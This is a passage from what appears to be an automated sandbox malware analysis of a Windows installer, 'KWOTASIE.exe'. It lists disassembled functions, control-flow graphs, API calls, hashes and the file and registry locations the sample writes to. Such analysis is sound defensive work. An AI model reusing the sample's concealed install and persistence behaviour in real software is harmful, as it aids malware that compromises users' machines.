                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Innoxious\olivilin$C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct$Unknownness$frerhunde\bordeauxvske\negroization
              • API String ID: 1941528284-23979270
              • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
              • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
              • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
              • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 627 4052b0-4052c5 628 4052cb-4052dc 627->628 629 40537c-405380 627->629 630 4052e7-4052f3 lstrlenW 628->630 631 4052de-4052e2 call 40626e 628->631 633 405310-405314 630->633 634 4052f5-405305 lstrlenW 630->634 631->630 636 405323-405327 633->636 637 405316-40531d SetWindowTextW 633->637 634->629 635 405307-40530b lstrcatW 634->635 635->633 638 405329-40536b SendMessageW * 3 636->638 639 40536d-40536f 636->639 637->636 638->639 639->629 640 405371-405374 639->640 640->629
              APIs
              • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
              • lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
              • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
              • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\
              • API String ID: 2531174081-2091390317
              • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
              • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 641 4065b6-4065d6 GetSystemDirectoryW 642 4065d8 641->642 643 4065da-4065dc 641->643 642->643 644 4065ed-4065ef 643->644 645 4065de-4065e7 643->645 647 4065f0-406623 wsprintfW LoadLibraryExW 644->647 645->644 646 4065e9-4065eb 645->646 646->647
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
              • wsprintfW.USER32 ref: 00406608
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 648 4030fa-403111 649 403113 648->649 650 40311a-403122 648->650 649->650 651 403124 650->651 652 403129-40312e 650->652 651->652 653 403130-403139 call 4032f5 652->653 654 40313e-40314b call 4032df 652->654 653->654 658 403151-403155 654->658 659 403296 654->659 660 40315b-40317b GetTickCount call 406787 658->660 661 40327f-403281 658->661 662 403298-403299 659->662 672 4032d5 660->672 674 403181-403189 660->674 663 403283-403286 661->663 664 4032ca-4032ce 661->664 666 4032d8-4032dc 662->666 667 403288 663->667 668 40328b-403294 call 4032df 663->668 669 4032d0 664->669 670 40329b-4032a1 664->670 667->668 668->659 681 4032d2 668->681 669->672 675 4032a3 670->675 676 4032a6-4032b4 call 4032df 670->676 672->666 678 40318b 674->678 679 40318e-40319c call 4032df 674->679 675->676 676->659 684 4032b6-4032c2 call 405df0 676->684 678->679 679->659 687 4031a2-4031ab 679->687 681->672 690 4032c4-4032c7 684->690 691 40327b-40327d 684->691 689 4031b1-4031ce call 4067a7 687->689 694 4031d4-4031eb GetTickCount 689->694 695 403277-403279 689->695 690->664 691->662 696 403236-403238 694->696 697 4031ed-4031f5 694->697 695->662 700 40323a-40323e 696->700 701 40326b-40326f 696->701 698 4031f7-4031fb 697->698 699 4031fd-40322e MulDiv wsprintfW call 4052b0 697->699 698->696 698->699 706 403233 699->706 704 403240-403245 call 405df0 700->704 705 403253-403259 700->705 701->674 702 403275 701->702 702->672 709 40324a-40324c 704->709 708 40325f-403263 705->708 706->696 708->689 710 403269 708->710 709->691 711 40324e-403251 709->711 710->672 711->708
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CountTick$wsprintf
              • String ID: ... %d%%
              • API String ID: 551687249-2449383134
              • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
              • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 712 40577f-4057ca CreateDirectoryW 713 4057d0-4057dd GetLastError 712->713 714 4057cc-4057ce 712->714 715 4057f7-4057f9 713->715 716 4057df-4057f3 SetFileSecurityW 713->716 714->715 716->714 717 4057f5 GetLastError 716->717 717->715
              APIs
              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
              • GetLastError.KERNEL32 ref: 004057D6
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
              • GetLastError.KERNEL32 ref: 004057F5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\Desktop
              • API String ID: 3449924974-1246513382
              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 718 405d6d-405d79 719 405d7a-405dae GetTickCount GetTempFileNameW 718->719 720 405db0-405db2 719->720 721 405dbd-405dbf 719->721 720->719 722 405db4 720->722 723 405db7-405dba 721->723 722->723
              APIs
              • GetTickCount.KERNEL32 ref: 00405D8B
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\KWOTASIE.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589), ref: 00405DA6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-1988354106
              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 724 4023de-40240f call 402c37 * 2 call 402cc7 731 402415-40241f 724->731 732 402abf-402ace 724->732 734 402421-40242e call 402c37 lstrlenW 731->734 735 402432-402435 731->735 734->735 737 402437-402448 call 402c15 735->737 738 402449-40244c 735->738 737->738 742 40245d-402471 RegSetValueExW 738->742 743 40244e-402458 call 4030fa 738->743 746 402473 742->746 747 402476-402557 RegCloseKey 742->747 743->742 746->747 747->732 749 402885-40288c 747->749 749->732
              APIs
              • lstrlenW.KERNEL32(C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000023,00000011,00000002), ref: 00402429
              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402469
              • RegCloseKey.ADVAPI32(?,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,00000000,00000011,00000002), ref: 00402551
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CloseValuelstrlen
              • String ID: C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct
              • API String ID: 2655323295-2390424612
              • Opcode ID: 0473d0a5ea99ee64442fe898aa5f55d204352a87270dccf6c48c871937c9d035
              • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
              • Opcode Fuzzy Hash: 0473d0a5ea99ee64442fe898aa5f55d204352a87270dccf6c48c871937c9d035
              • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
              APIs
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
              • RegCloseKey.ADVAPI32(?), ref: 00402D98
              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Close$Enum
              • String ID:
              • API String ID: 464197530-0
              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
              APIs
                • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\,?,00405C3C,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BD6
                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Innoxious\olivilin,?,00000000,000000F0), ref: 0040164D
              Strings
              • C:\Users\user\AppData\Local\Innoxious\olivilin, xrefs: 00401640
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Innoxious\olivilin
              • API String ID: 1892508949-136261422
              • Opcode ID: 3620efb9bc51b013d0db565b85ce8851868fe216be8260567c1b6201130560c4
              • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
              • Opcode Fuzzy Hash: 3620efb9bc51b013d0db565b85ce8851868fe216be8260567c1b6201130560c4
              • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
              APIs
                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\,?,00405C3C,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BD6
                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
              • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C7E
              • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405C8E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID: C:\
              • API String ID: 3248276644-3404278061
              • Opcode ID: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
              • Instruction ID: 8cd04150762c6b8d6a28599447491585beeb2d0428c1c24898b3a9decc440bb2
              • Opcode Fuzzy Hash: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
              • Instruction Fuzzy Hash: 0BF0F42910DF1115E226323A1D0AEAF1555CE83364B4E053FF851B22C5DE3C9A538DAE
              APIs
              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Remove folder: ,?,?,0040638E,80000002), ref: 00406160
              • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040616B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
